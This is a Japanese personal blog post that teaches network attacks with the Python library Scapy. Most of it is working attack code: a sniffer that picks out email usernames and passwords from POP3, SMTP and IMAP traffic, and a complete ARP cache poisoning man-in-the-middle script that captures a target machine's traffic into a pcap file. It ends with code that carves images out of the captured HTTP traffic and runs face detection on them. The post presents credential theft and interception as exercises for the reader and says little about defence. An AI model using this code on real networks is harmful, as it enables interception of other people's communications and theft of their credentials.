気まぐれブログ(日記・技術記事・研究のことなど)

気まぐれに更新します.温かい目で見ていただければ...

サイバーセキュリティプログラミング(ARPキャッシュポイズニング)

今回は「Scapy」と呼ばれるライブラリを使用して,ネットワーク掌握に挑戦してみましょう.さらに,ARPキャッシュポイズニングという攻撃を仕掛けられるようにしましょう.

Scapyの使い方

以下のようなコードを書くだけで簡単にパケット傍受をすることができます.

from scapy.all import *

def packet_callback(packet):
    print(packet.show())

sniff(prn=packet_callback, count=2)

結果

###[ Ethernet ]###
  dst       = ***
  src       = ***
  type      = 0x800
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 52
     id        = 0
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x81a5
     src       = ***
     dst       = ***
     \options   \
###[ TCP ]###
        sport     = 56788
        dport     = http
        seq       = 1954241764
        ack       = 3139339433
        dataofs   = 8
        reserved  = 0
        flags     = FA
        window    = 2062
        chksum    = 0xae90
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (2132219310, 2395993116))]

None
###[ Ethernet ]###
  dst       = ***
  src       = ***
  type      = 0x800
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 40
     id        = 44805
     flags     =
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x8a28
     src       = ***
     dst       = ***
     \options   \
###[ TCP ]###
        sport     = 56662
        dport     = https
        seq       = 4011062313
        ack       = 3114940467
        dataofs   = 5
        reserved  = 0
        flags     = A
        window    = 2048
        chksum    = 0xb204
        urgptr    = 0
        options   = []

None

このプログラムを元に,電子メールの認証情報を窃取してみましょう.

from scapy.all import *

def packet_callback(packet):
    if packet[TCP].payload:
        mail_packet = str(packet[TCP].payload)
        if "user" in mail_packet.lower() or  "pass" in mail_packet.lower():
            print("[*] Server: {0}".format(packet[IP].dst))
            print("[*] {0}".format(packet[TCP].payload))

# store=0で,メモリー上にパケットを保持しないようにする.
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)

ARPキャッシュポイズニング

続いてARPキャッシュポイズニングに挑戦してみましょう.

# 実行前に,sudo sysctl -w net.inet.ip.forwarding=1を実行する
from scapy.all import *
import os
import sys
import threading
import signal

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    print("[*] Restoring target ... ")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

def get_mac(ip_address):
    responses, unanswered = srp(Ether(
        dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address), timeout=2, retry=10)

    for s, r in responses:
        return r[Ether].src

    return None

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac, stop_event):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print("[*] Begining the ARP poison. [CTRL-C to stop]")

    while True:
        send(poison_target)
        send(poison_gateway)

        if stop_event.wait(2):
            break
    
    print("[*] ARP poison attack finished!")
    return

interface = "en0"
target_ip = "192.168.3.8"
gateway_ip = "192.168.3.1"
packet_count = 5000

# インターフェースの設定
conf.iface = interface

# 出力の停止
conf.verb = 0

print("[*] Setting up {0}".format(interface))

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting.")
    sys.exit(0)
else:
    print("[*] Gateway {0} is at {1}".format(gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)

if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting.")
    sys.exit(0)
else:
    print("[*] Target {0} is at {1}".format(target_ip, target_mac))

stop_event = threading.Event()
poison_thread = threading.Thread(target = poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac, stop_event))
poison_thread.start()

print("[*] Starting sniffer for {0} packets".format(packet_count))

bpf_filter = "ip host {0}".format(target_ip)
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)

wrpcap('arper.pcap', packets)

stop_event.set()
poison_thread.join()

restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

コメントにも書いてある通り,プログラムを実行する前に以下のコマンドを打ちましょう.

$ sudo sysctl -w net.inet.ip.forwarding=1

このプログラムを実行している間,ARPキャッシュに存在する標的マシンのデフォルトゲートウェイmacアドレスが,攻撃マシンのmacアドレスと一致していることに気づくでしょう.そしてプログラムを終了させると元に戻っていることがわかります.プログラムの実行中,標的マシンに関係する通信は全て攻撃マシンに取得されることになります.

pcapファイルの処理

ここでは取得したpcapファイルを処理するプログラムを書きます.具体的には,pcapファイル中に存在する画像データを抽出し,その中に顔の画像が何枚存在するかを検証していきます.

現在編集中...

import re
import zlib
import cv2

from scapy.all import *

pictures_directory = "pictures"
faces_directory = "faces"
pcap_file = "arper.pcap"

def get_http_headers(http_payload):
    try:
        headers_raw = http_payload[:http_payload.index("\r\n\r\n") + 2]
        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
    except:
        return None

    if "Content-Type" not in headers:
        return None

    return headers

def extract_image(headers, http_payload):
    image = None
    image_type = None

    try:
        if "image" in headers['Content-Type']:
            image_type = headers['Content-Type'].split("/")[1]
            image = http_payload[http_payload.index("\r\n\r\n") + 4:]

            try:
                if "Content-Encoding" in headers.keys():
                    if headers['Content-Encoding'] == 'gzip':
                        image = zlib.decompress(image, 16+zlib.MAX_WBITS)
                    elif headers['Content-Encoding'] == "deflate":
                            image = zlib.decompress(image)
            except:
                pass
    except:
        return None, None

    return image, image_type

def face_detect(path, file_name):
    img = cv2.imread(path)
    cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
    rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

    if len(rects) == 0:
        return False
    
    rects[:, 2:] += rects[:, :2]

    for x1, y1, x2, y2 in rects:
        cv2.rectangle(img, (x1, y1), (x2, y2), (127,255,0), 2)

    cv2.imwrite("{0}/{1}-{2}".format(faces_directory, pcap_file, file_name), img)

    return True


def http_assembler(pcap_file):
    carved_images = 0
    faces_detected = 0

    a = rdpcap(pcap_file)

    sessions = a.sessions()

    # pcapファイルの各セッションについてみていく.
    for session in sessions:
        http_payload = ""

        for packet in sessions[session]:
            try:
                # httpに関するパケットをみていく.
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                    http_payload += str(packet[TCP].payload)
            except:
                pass

        headers = get_http_headers(http_payload)

        if headers is None:
            continue

        image, image_type = extract_image(headers, http_payload)

        if image is not None and image_type is not None:
            file_name = "{0}-pic-carver_{1}.{2}".format(pcap_file, carved_images, image_type)

            fd = open("{0}/{1}".format(pictures_directory, file_name), "wb")

            fd.write(image)
            fd.close()

            carved_images += 1

            try:
                result = face_detect("{0}/{1}".format(pictures_directory, file_name), file_name)
                if result is True:
                    faces_detected += 1
            except:
                pass

    return carved_images, faces_detected

carved_images, faces_detected = http_assembler(pcap_file)

print("Extracted: {0} images".format(carved_images))
print("Detected: {0} faces".format(faces_detected))